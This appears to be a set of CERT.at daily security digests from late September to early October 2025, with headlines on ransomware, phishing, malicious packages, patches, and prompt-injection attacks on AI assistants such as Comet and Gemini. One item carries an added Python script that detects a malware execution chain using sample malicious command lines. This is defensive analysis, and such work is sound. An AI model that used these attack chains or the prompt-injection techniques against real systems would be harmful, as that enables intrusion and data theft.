=====================
= End-of-Day report =
=====================
Timeframe: Thursday 02-10-2025 18:00 - Friday 03-10-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Oracle links Clop extortion attacks to July 2025 vulnerabilities ∗∗∗
---------------------------------------------
Oracle has linked an ongoing extortion campaign claimed by the Clop ransomware gang to E-Business Suite (EBS) vulnerabilities that were patched in July 2025.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/oracle-links-clop-extortion-…
∗∗∗ CometJacking attack tricks Comet browser into stealing emails ∗∗∗
---------------------------------------------
A new attack called CometJacking exploits URL parameters to pass hidden instructions to Perplexity's Comet AI browser that allow access to sensitive data from connected services, like email and calendar.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/commetjacking-attack-tricks-…
∗∗∗ Security vulnerability in dental practice system ∗∗∗
---------------------------------------------
A practice management system used by some dental practices had serious vulnerabilities - they would have allowed patient data to be read and modified.
---------------------------------------------
https://www.golem.de/news/security-sicherheitsluecke-in-zahnarztpraxen-syst…
∗∗∗ Coordinated Grafana Exploitation Attempts on 28 September ∗∗∗
---------------------------------------------
GreyNoise observed a sharp one-day surge of exploitation attempts targeting CVE-2021-43798 — a Grafana path traversal vulnerability that enables arbitrary file reads. All observed IPs are classified as malicious.
---------------------------------------------
https://www.greynoise.io/blog/coordinated-grafana-exploitation-attempts
∗∗∗ It's Never Simple Until It Is (Dell UnityVSA Pre-Auth Command Injection CVE-2025-36604) ∗∗∗
---------------------------------------------
Welcome back, and what a week! We’re glad that happened for you and/or sorry that happened to you. It will get better and/or worse, and you will likely survive. Today, we’re walking down the garden path and digging into the archives, publishing our analysis of a vulnerability we discovered and disclosed to Dell in March 2025 within their UnityVSA solution.
---------------------------------------------
https://labs.watchtowr.com/its-never-simple-until-it-is-dell-unityvsa-pre-a…
=====================
= Vulnerabilities =
=====================
∗∗∗ DrayTek warns of remote code execution bug in Vigor routers ∗∗∗
---------------------------------------------
Networking hardware maker DrayTek released an advisory to warn about a security vulnerability in several Vigor router models that could allow remote, unauthenticated actors to execute arbitrary code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/draytek-warns-of-remote-code…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (idm:DL1), Debian (gegl and haproxy), Fedora (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), Oracle (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), Red Hat (git), SUSE (curl, frr, jupyter-jupyterlab, and libsuricata8_0_1), and Ubuntu (linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-azure, linux-azure-6.8, linux-fips, linux-gcp-fips, and linux-intel-iot-realtime, linux-realtime).
---------------------------------------------
https://lwn.net/Articles/1040729/
∗∗∗ CISA Releases Two Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
CISA released two Industrial Control Systems (ICS) advisories on October 2, 2025: ICSA-25-275-01 Raise3D Pro2 Series 3D Printers and ICSA-25-275-02 Hitachi Energy MSM Product.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/10/02/cisa-releases-two-indust…
∗∗∗ Critical Splunk Vulnerabilities Expose Platforms to Remote JavaScript Injection and More ∗∗∗
---------------------------------------------
Splunk has disclosed six critical security vulnerabilities impacting multiple versions of both Splunk Enterprise and Splunk Cloud Platform. These Splunk vulnerabilities, collectively highlighting serious weaknesses in Splunk’s web components, could allow attackers to execute unauthorized JavaScript code remotely, access sensitive information, and perform server-side request forgery (SSRF) attacks.
---------------------------------------------
https://thecyberexpress.com/critical-splunk-vulnerabilities/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 01-10-2025 18:00 - Thursday 02-10-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ That annoying SMS phish you just got may have come from a box like this ∗∗∗
---------------------------------------------
Smishers looking for new infrastructure are getting creative.
---------------------------------------------
https://arstechnica.com/security/2025/10/that-annoying-sms-phish-you-just-g…
∗∗∗ Adobe Analytics bug leaked customer tracking data to other tenants ∗∗∗
---------------------------------------------
Adobe is warning its Analytics customers that an ingestion bug caused data from some organizations to appear in the analytics instances of others for approximately one day.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/adobe-analytics-bug-leaked-c…
∗∗∗ Clop extortion emails claim theft of Oracle E-Business Suite data ∗∗∗
---------------------------------------------
Mandiant and Google are tracking a new extortion campaign where executives at multiple companies received emails claiming that sensitive data was stolen from their Oracle E-Business Suite systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/clop-extortion-emails-claim-…
∗∗∗ Android spyware campaigns impersonate Signal and ToTok messengers ∗∗∗
---------------------------------------------
Two new spyware campaigns that researchers call ProSpy and ToSpy lured Android users with fake upgrades or plugins for the Signal and ToTok messaging apps to steal sensitive data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/android-spyware-campaigns-im…
∗∗∗ Shutdown Threatens US Intel Sharing, Cyber Defense ∗∗∗
---------------------------------------------
Lapse of critical information sharing and mass furloughs at CISA are just some of the concerns.
---------------------------------------------
https://www.darkreading.com/cyber-risk/shutdown-us-intel-sharing-cyber-defe…
∗∗∗ Data leak: Schufa subsidiary Bonify confirms security incident ∗∗∗
---------------------------------------------
Unknown actors have captured identification data of Bonify users, including ID-card data and photos.
---------------------------------------------
https://www.golem.de/news/datenleck-schufa-tochter-bonify-bestaetigt-sicher…
∗∗∗ 570 GB of GitHub data: Red Hat reports security incident ∗∗∗
---------------------------------------------
The extortion group Crimson Collective is allegedly in possession of confidential Red Hat customer data - and is demanding a ransom.
---------------------------------------------
https://www.golem.de/news/570-gbyte-github-daten-red-hat-meldet-sicherheits…
∗∗∗ New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus Interposer ∗∗∗
---------------------------------------------
In yet another piece of research, academics from Georgia Institute of Technology and Purdue University have demonstrated that the security guarantees offered by Intel's Software Guard eXtensions (SGX) can be bypassed on DDR4 systems to passively decrypt sensitive data.
---------------------------------------------
https://thehackernews.com/2025/10/new-wiretap-attack-extracts-intel-sgx.html
∗∗∗ Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown ∗∗∗
---------------------------------------------
Cybersecurity researchers have flagged a malicious package on the Python Package Index (PyPI) repository that claims to offer the ability to create a SOCKS5 proxy service, while also providing a stealthy backdoor-like functionality to drop additional payloads on Windows systems. The deceptive package, named soopsocks, attracted a total of 2,653 downloads before it was taken down.
---------------------------------------------
https://thehackernews.com/2025/10/alert-malicious-pypi-package-soopsocks.ht…
∗∗∗ EU funds are flowing into spyware companies, and politicians are demanding answers ∗∗∗
---------------------------------------------
Experts say Commission is ‘fanning the flames’ of the continent’s own Watergate. An arsenal of angry European Parliament members (MEPs) is demanding answers from senior commissioners about why EU subsidies are ending up in the pockets of spyware companies.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/10/02/eu_spyware_f…
∗∗∗ ENISA Threat Landscape 2025 ∗∗∗
---------------------------------------------
Through a more threat-centric approach and further contextual analysis, this latest edition of the ENISA Threat Landscape analyses 4875 incidents over a period spanning from 1 July 2024 to 30 June 2025.
---------------------------------------------
https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025
∗∗∗ Meet SpamGPT and MatrixPDF, AI Toolkits Driving Malware Attacks ∗∗∗
---------------------------------------------
Cybersecurity researchers at Varonis have discovered two new plug-and-play cybercrime toolkits, MatrixPDF and SpamGPT. Learn how these AI-powered tools make mass phishing and PDF malware accessible to anyone, redefining online security risks.
---------------------------------------------
https://hackread.com/spamgpt-matrixpdf-ai-toolkits-malware-attacks/
∗∗∗ Malicious ZIP Files Use Windows Shortcuts to Drop Malware ∗∗∗
---------------------------------------------
Cybersecurity firm Blackpoint Cyber reveals a new spear phishing campaign targeting executives. Learn how attackers use fraudulent document ZIPs containing malicious shortcut files, leveraging living off the land tactics, and a unique Anti-Virus check to deliver a custom payload.
---------------------------------------------
https://hackread.com/malicious-zip-files-windows-shortcuts-malware/
∗∗∗ $20 YoLink IoT Gateway Vulnerabilities Put Home Security at Risk ∗∗∗
---------------------------------------------
Four critical zero-day flaws found in the $20 YoLink Smart Hub allow remote physical access, threatening your home security. See the urgent steps you must take now.
---------------------------------------------
https://hackread.com/20-yolink-iot-gateway-vulnerabilities-home-security/
∗∗∗ Confucius Espionage: From Stealer to Backdoor ∗∗∗
---------------------------------------------
The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia. First identified in 2013, the group is believed to have links to state-sponsored operations in the region.
---------------------------------------------
https://feeds.fortinet.com/~/925674278/0/fortinet/blogs~Confucius-Espionage…
=====================
= Vulnerabilities =
=====================
∗∗∗ Chrome 141: Google closes serious security vulnerabilities ∗∗∗
---------------------------------------------
Google has updated its Chrome browser to version 141. According to the release notes, the update includes patches for 21 security vulnerabilities. At least two of them are rated high risk. Under certain circumstances they allow remote injection and execution of malicious code within the browser's sandbox.
---------------------------------------------
https://www.golem.de/news/chrome-141-google-schliesst-schwerwiegende-sicher…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (perl-JSON-XS), Debian (chromium and openssl), Fedora (bird, dnsdist, firefox, mapserver, ntpd-rs, python-nh3, rust-ammonia, skopeo, sqlite, thunderbird, and xen), Oracle (perl-JSON-XS), Red Hat (kernel, kernel-rt, and libvpx), SUSE (afterburn, cairo, docker-stable, firefox, nginx, python-Django, snpguest, and warewulf4), and Ubuntu (libmspack, libxslt, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-hwe-6.14, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-oracle, linux, linux-aws, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm, linux-ibm-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux, linux-kvm, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-hwe-6.8, linux-kvm, linux-oracle-5.15, linux-oracle-6.14, linux-raspi, linux-raspi-realtime, linux-realtime, linux-realtime-6.8, linux-realtime-6.14, and python-django).
---------------------------------------------
https://lwn.net/Articles/1040591/
∗∗∗ Stand-alone Security Patch Available for Tenable Security Center versions 6.5.1 and 6.6.0 ∗∗∗
---------------------------------------------
Tenable has released Security Center Patch SC-202509.2.1 to address these issues.
---------------------------------------------
https://www.tenable.com/security/tns-2025-20
∗∗∗ Security patches: OpenSSL vulnerable to malicious-code attacks ∗∗∗
---------------------------------------------
The developers have closed three security vulnerabilities in current OpenSSL versions. So far there are no reports of attacks.
---------------------------------------------
https://www.heise.de/news/OpenSSL-Angreifer-koennen-auf-ARM-Systemen-privat…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 30-09-2025 18:00 - Wednesday 01-10-2025 18:00
Handler: Guenes Holler
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ China Imposes One-Hour Reporting Rule for Major Cyber Incidents ∗∗∗
---------------------------------------------
The sweeping new regulations show that China's serious about hardening its own networks after launching widespread attacks on global networks.
---------------------------------------------
https://www.darkreading.com/cybersecurity-operations/china-one-hour-reporti…
∗∗∗ MatrixPDF: New hacker tool turns PDF files into phishing lures ∗∗∗
---------------------------------------------
It can be used to craft malicious PDF files so that they bypass Gmail's phishing filter.
---------------------------------------------
https://www.golem.de/news/matrixpdf-neues-hacker-tool-macht-pdf-dateien-zu-…
∗∗∗ New Android Banking Trojan “Klopatra” Uses Hidden VNC to Control Infected Smartphones ∗∗∗
---------------------------------------------
A previously undocumented Android banking trojan called Klopatra has compromised over 3,000 devices, with a majority of the infections reported in Spain and Italy. Italian fraud prevention firm Cleafy, which discovered the sophisticated malware ..
---------------------------------------------
https://thehackernews.com/2025/10/new-android-banking-trojan-klopatra.html
∗∗∗ Hackers Exploit Milesight Routers to Send Phishing SMS to European Users ∗∗∗
---------------------------------------------
Unknown threat actors are abusing Milesight industrial cellular routers to send SMS messages as part of a smishing campaign targeting users in European countries since at least February 2022. French cybersecurity company SEKOIA said the attackers are exploiting ..
---------------------------------------------
https://thehackernews.com/2025/10/hackers-exploit-milesight-routers-to.html
∗∗∗ Red Hat OpenShift AI Flaw Exposes Hybrid Cloud Infrastructure to Full Takeover ∗∗∗
---------------------------------------------
A severe security flaw has been disclosed in the Red Hat OpenShift AI service that could allow attackers to escalate privileges and take control of the complete infrastructure under certain conditions. OpenShift AI is a platform for managing the lifecycle ..
---------------------------------------------
https://thehackernews.com/2025/10/critical-red-hat-openshift-ai-flaw.html
∗∗∗ OneLogin Bug Let Attackers Use API Keys to Steal OIDC Secrets and Impersonate Apps ∗∗∗
---------------------------------------------
A high-severity security flaw has been disclosed in the One Identity OneLogin Identity and Access Management (IAM) solution that, if successfully exploited, could expose sensitive OpenID Connect (OIDC) application client secrets under certain ..
---------------------------------------------
https://thehackernews.com/2025/10/onelogin-bug-let-attackers-use-api-keys.h…
∗∗∗ New phishing waves in the name of the WKO ∗∗∗
---------------------------------------------
Criminals are currently trying to cause damage through two scams in the name of the Austrian Federal Economic Chamber (Wirtschaftskammer Österreich). They concern the updating of company data and payment information for the membership fee. Particularly dangerous: For ..
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-wellen-wko/
∗∗∗ TOTOLINK X6000R: Three New Vulnerabilities Uncovered ∗∗∗
---------------------------------------------
Researchers identified vulnerabilities in TOTOLINK X6000R routers: CVE-2025-52905, CVE-2025-52906 and CVE-2025-52907. We discuss root cause and impact.
---------------------------------------------
https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/
∗∗∗ North Korea IT worker scheme expanding to more industries, countries outside of US tech sector ∗∗∗
---------------------------------------------
Okta said their new research into the scheme revealed that North Korea has honed its skills on U.S.-based companies and has expanded into dozens of different countries and industries.
---------------------------------------------
https://therecord.media/north-korea-it-worker-scheme-expands-outisde-us-tech
∗∗∗ Detour Dog’s DNS Hijacking Infects 30,000 Websites with Strela Stealer ∗∗∗
---------------------------------------------
Infoblox reveals how the Detour Dog group used server-side DNS to compromise 30,000+ sites across 89 countries, installing the stealthy Strela Stealer malware.
---------------------------------------------
https://hackread.com/detour-dog-dns-hijacking-websites-strela-stealer/
∗∗∗ Security update: Malicious-code vulnerability threatens Western Digital NAS models ∗∗∗
---------------------------------------------
Attackers can attack certain Western Digital network storage devices running My Cloud OS.
---------------------------------------------
https://heise.de/-10696726
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, kernel-rt, mysql:8.0, and openssh), Debian (libcommons-lang-java, libcommons-lang3-java, libcpanel-json-xs-perl, libjson-xs-perl, libxml2, open-vm-tools, and u-boot), Fedora (bird, dnsdist, mapserver, ntpd-rs, python-nh3, and rust-ammonia), Oracle (kernel and mysql:8.0), Red Hat (cups, postgresql:12, and postgresql:13), SUSE (cJSON-devel, gimp, kernel-devel, kubecolor, open-vm-tools, openssl-1_1, openssl-3, and ruby3.4-rubygem-rack), ..
---------------------------------------------
https://lwn.net/Articles/1040375/
∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
CISA released ten Industrial Control Systems (ICS) advisories on September 30, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-273-01 MegaSys Enterprises Telenium Online Web Application; ICSA-25-273-02 Festo SBRD-Q/SBOC-Q/SBOI-Q; ICSA-25-273-03 Festo CPX-CEC-C1 and ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/30/cisa-releases-ten-indust…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 29-09-2025 18:00 - Tuesday 30-09-2025 18:00
Handler: n/a
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ Ransomware gang sought BBC reporter’s help in hacking media giant ∗∗∗
---------------------------------------------
Threat actors claiming to represent the Medusa ransomware gang tempted a BBC correspondent to become an insider threat by offering a significant amount of money.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ransomware-gang-sought-bbc-r…
∗∗∗ AI-Powered Voice Cloning Raises Vishing Risks ∗∗∗
---------------------------------------------
A researcher-developed framework could enable attackers to conduct real-time conversations using simulated audio to compromise organizations and extract sensitive information.
---------------------------------------------
https://www.darkreading.com/cyberattacks-data-breaches/ai-voice-cloning-vis…
∗∗∗ Researchers Disclose Google Gemini AI Flaws Allowing Prompt Injection and Cloud Exploits ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed three now-patched security vulnerabilities impacting Google's Gemini artificial intelligence (AI) assistant that, if successfully exploited, could have exposed users to major privacy risks and data theft.
---------------------------------------------
https://thehackernews.com/2025/09/researchers-disclose-google-gemini-ai.html
∗∗∗ Google’s Latest AI Ransomware Defense Only Goes So Far ∗∗∗
---------------------------------------------
Google has launched a new AI-based protection in Drive for desktop that can shut down an attack before it spreads—but its benefits have their limits.
---------------------------------------------
https://www.wired.com/story/googles-latest-ai-ransomware-defense-only-goes-…
∗∗∗ On GitHub: Numerous fakes of well-known Mac apps are circulating ∗∗∗
---------------------------------------------
In an apparently concerted action, scammers are trying to distribute fake apps for Mac users. It is unclear what the purpose is.
---------------------------------------------
https://www.heise.de/news/Auf-GitHub-Zahlreiche-Fakes-bekannter-Mac-Apps-ku…
∗∗∗ Beware of landline spoofing: Criminals use (partly) real phone numbers! ∗∗∗
---------------------------------------------
Anyone currently receiving calls from supposed bank advisors should be particularly suspicious and cautious! Criminals are increasingly succeeding in using real, existing service landline numbers as cover for their scams. The goal of this "spoofing" is access to the victim's account.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsich-festnetz-spoofing/
∗∗∗ Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite ∗∗∗
---------------------------------------------
Phantom Taurus is a previously undocumented Chinese threat group. Explore how this group's distinctive toolset led to uncovering their existence.
---------------------------------------------
https://unit42.paloaltonetworks.com/phantom-taurus/
∗∗∗ XiebroC2 Identified in MS-SQL Server Attack Cases ∗∗∗
---------------------------------------------
AhnLab Security intelligence Center (ASEC) monitors attacks targeting poorly managed MS-SQL servers and recently confirmed a case involving the use of XiebroC2. XiebroC2 is a C2 framework with open-source code that supports various features such as information collection, remote control, and defense evasion, similar to CobaltStrike.
---------------------------------------------
https://asec.ahnlab.com/en/90369/
∗∗∗ Cybercrime Observations from the Frontlines: UNC6040 Proactive Hardening Recommendations ∗∗∗
---------------------------------------------
Protecting software-as-a-service (SaaS) platforms and applications requires a comprehensive security strategy. Drawing from analysis of UNC6040’s specific attack methodologies, this guide presents a structured defensive framework encompassing proactive hardening measures, comprehensive logging protocols, and advanced detection capabilities.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/unc6040-proactive-…
∗∗∗ When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise ∗∗∗
---------------------------------------------
In early 2025, we encountered a mission-critical software component called TRUfusion Enterprise on the perimeter of one of our customers that is used to transfer highly sensitive data. Since Rocket Software claims that they are undergoing regular audits and also follow secure coding guidelines, we didn’t expect to find much but to our surprise, it took us just two minutes to discover the first totally unsophisticated, but critical pre-auth path traversal vulnerability that already gave us admin rights.
---------------------------------------------
https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth…
=====================
= Vulnerabilities =
=====================
∗∗∗ Broadcom fixes high-severity VMware NSX bugs reported by NSA ∗∗∗
---------------------------------------------
Broadcom has released security updates to patch two high-severity VMware NSX vulnerabilities reported by the U.S. National Security Agency (NSA).
---------------------------------------------
https://www.bleepingcomputer.com/news/security/broadcom-fixes-high-severity…
∗∗∗ IBM App Connect Enterprise Toolkit can leak data ∗∗∗
---------------------------------------------
Important security updates have been released for IBM App Connect Enterprise Toolkit, InfoSphere and WebSphere.
---------------------------------------------
https://www.heise.de/news/IBM-App-Connect-Enterprise-Toolkit-kann-Daten-lea…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (python-internetarchive and tiff), Fedora (nextcloud), Oracle (kernel, openssh, and squid), Red Hat (kernel, kernel-rt, and ncurses), SUSE (afterburn and chromium), and Ubuntu (open-vm-tools, ruby-rack, and tiff).
---------------------------------------------
https://lwn.net/Articles/1040152/
∗∗∗ Security Vulnerabilities fixed in Firefox 143.0.3 ∗∗∗
---------------------------------------------
Mozilla has fixed three vulnerabilities labeled as high.
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2025-80/
∗∗∗ Critical Vulnerability Alert: CVE-2025-10035 in GoAnywhere MFT ∗∗∗
---------------------------------------------
A critical security vulnerability (CVE-2025-10035) has been identified in GoAnywhere MFT, a widely used file transfer solution developed by Fortra.
---------------------------------------------
https://www.bitsight.com/blog/critical-vulnerability-alert-cve-2025-10035-g…
∗∗∗ Apple Security Update Addresses Critical Font Parser Vulnerability Across Multiple Platforms ∗∗∗
---------------------------------------------
Apple has rolled out a series of important security updates across multiple platforms, addressing a vulnerability affecting the system font parser. These Apple security updates cover iOS, iPadOS, macOS, visionOS, watchOS, and tvOS.
---------------------------------------------
https://thecyberexpress.com/apple-security-updates/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 26-09-2025 18:00 - Monday 29-09-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ First Malicious MCP in the Wild: The Postmark Backdoor That's Stealing Your Emails ∗∗∗
---------------------------------------------
This is the world’s first sighting of a real world malicious MCP server. The attack surface for endpoint supply chain attacks is slowly becoming the enterprise’s biggest attack surface.
---------------------------------------------
https://www.koi.security/blog/postmark-mcp-npm-malicious-backdoor-email-the…
∗∗∗ Akira ransomware breaching MFA-protected SonicWall VPN accounts ∗∗∗
---------------------------------------------
Ongoing Akira ransomware attacks targeting SonicWall SSL VPN devices continue to evolve, with the threat actors found to be successfully logging in despite OTP MFA being enabled on accounts. Researchers suspect that this may be achieved through the use of previously stolen OTP seeds, although the exact method remains unconfirmed.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/akira-ransomware-breaching-m…
∗∗∗ Pointer leaks through pointer-keyed data structures ∗∗∗
---------------------------------------------
Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices.
---------------------------------------------
https://googleprojectzero.blogspot.com/2025/09/pointer-leaks-through-pointe…
∗∗∗ Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security ∗∗∗
---------------------------------------------
Microsoft is calling attention to a new phishing campaign primarily aimed at U.S.-based organizations that has likely utilized code generated using large language models (LLMs) to obfuscate payloads and evade security defenses. "Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent," the Microsoft Threat Intelligence team said in an analysis published last week.
---------------------------------------------
https://thehackernews.com/2025/09/microsoft-flags-ai-driven-phishing-llm.ht…
∗∗∗ Cyber threat-sharing law set to shut down, along with US government ∗∗∗
---------------------------------------------
Barring a last-minute deal, the US federal government would shut down on Wednesday, October 1, and the 2015 Cybersecurity Information Sharing Act would lapse at the same time, threatening what many consider a critical plank of US cybersecurity policy.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/09/26/government_s…
∗∗∗ Sex offenders, terrorists, drug dealers, exposed in spyware breach ∗∗∗
---------------------------------------------
RemoteCOM's monitoring software leaked the personal details of suspects, offenders, and the law enforcement officers tracking them.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2025/09/sex-offenders-terrorists-dru…
∗∗∗ From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion ∗∗∗
---------------------------------------------
The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has previously been reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of an MSI package, which deployed a Brute Ratel DLL file using rundll32.
---------------------------------------------
https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-e…
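The execution chain in the summary above (script host runs the JavaScript, an MSI is installed, rundll32 loads the DLL) is something a detection engineer can hunt for in process-creation telemetry. The following is an added example and not code from The DFIR Report: it rebuilds a process tree from a few constructed records whose fields are loosely modelled on Sysmon Event ID 1, and flags rundll32 executions that were spawned by msiexec and either descend from a script host or load their DLL from a user-writable directory. All PIDs, paths and file names are made up for the sample.

```python
"""Detect the wscript -> msiexec -> rundll32 execution chain.

Added example, not code from The DFIR Report. Records, PIDs and paths
are constructed for the sample.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # lower-case executable name
    cmdline: str


# Constructed sample records. Only pid 4100 matches the intrusion chain;
# 5100 is a benign installer control-panel call, 6000 a workstation lock.
EVENTS = [
    Proc(1000, 1, "explorer.exe", "explorer.exe"),
    Proc(2000, 1000, "wscript.exe", 'wscript.exe "C:\\Users\\u\\Downloads\\Tax_Form.js"'),
    Proc(3000, 2000, "msiexec.exe", "msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\setup.msi /qn"),
    Proc(4100, 3000, "rundll32.exe", "rundll32.exe C:\\ProgramData\\vc\\brt.dll,Start"),
    Proc(5000, 1000, "msiexec.exe", "msiexec.exe /i C:\\Users\\u\\Downloads\\7zip.msi"),
    Proc(5100, 5000, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    Proc(6000, 1000, "rundll32.exe", "rundll32.exe user32.dll,LockWorkStation"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def ancestry(events: list[Proc], pid: int) -> list[str]:
    """Image names from the given process up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain: list[str] = []
    seen: set[int] = set()
    while pid in by_pid and pid not in seen:   # guard against PID-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def rundll32_dll_path(cmdline: str) -> str:
    """Extract the DLL argument from a rundll32 command line, lower-cased."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return ""
    return parts[1].split(",", 1)[0].strip('"').lower()


def loads_dll_from_writable_path(cmdline: str) -> bool:
    return rundll32_dll_path(cmdline).startswith(WRITABLE_PREFIXES)


def flag_msi_spawned_rundll32(events: list[Proc]) -> list[int]:
    """PIDs of rundll32 processes whose parent is msiexec and that either
    descend from a script host or load a DLL from a writable location."""
    hits = []
    for e in events:
        if e.image != "rundll32.exe":
            continue
        chain = ancestry(events, e.pid)          # [rundll32, parent, grandparent, ...]
        if len(chain) < 2 or chain[1] != "msiexec.exe":
            continue
        if SCRIPT_HOSTS & set(chain[2:]) or loads_dll_from_writable_path(e.cmdline):
            hits.append(e.pid)
    return hits


if __name__ == "__main__":
    for pid in flag_msi_spawned_rundll32(EVENTS):
        print("suspicious rundll32:", pid, " <- ".join(ancestry(EVENTS, pid)))
```

One caveat for production use: on a real Windows host the msiexec that executes custom actions runs under the Windows Installer service (parent services.exe) rather than under the user's msiexec, so strict ancestry alone will miss the chain; the writable-DLL-path condition, or correlating the user-session msiexec and the rundll32 by user and time window, is the more robust signal.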
∗∗∗ Medusa Ransomware Claims Comcast Data Breach, Demands $1.2M ∗∗∗
---------------------------------------------
Medusa ransomware group claims 834 GB data theft from Comcast, demanding $1.2M ransom while sharing screenshots and file listings.
---------------------------------------------
https://hackread.com/medusa-ransomware-comcast-data-breach/
∗∗∗ CISA and UK NCSC Release Joint Guidance for Securing OT Systems ∗∗∗
---------------------------------------------
CISA, in collaboration with the Federal Bureau of Investigation, the United Kingdom’s National Cyber Security Centre, and other international partners has released new joint cybersecurity guidance: [Creating and Maintaining a Definitive View of Your Operational Technology (OT) Architecture].
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/29/cisa-and-uk-ncsc-release…
∗∗∗ Supply chain security for the 0.001% (and why it won’t catch on) ∗∗∗
---------------------------------------------
After yet another supply chain issue (npm this time, but it doesn’t really matter that much), Shai-hulud, 500 packages affected and millions of downloads later, I finally wrapped up the protection system for my dev environment. I really don’t want to be the next one exploited.
---------------------------------------------
https://blog.viraptor.info/post/supply-chain-security-for-the-0001-and-why-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
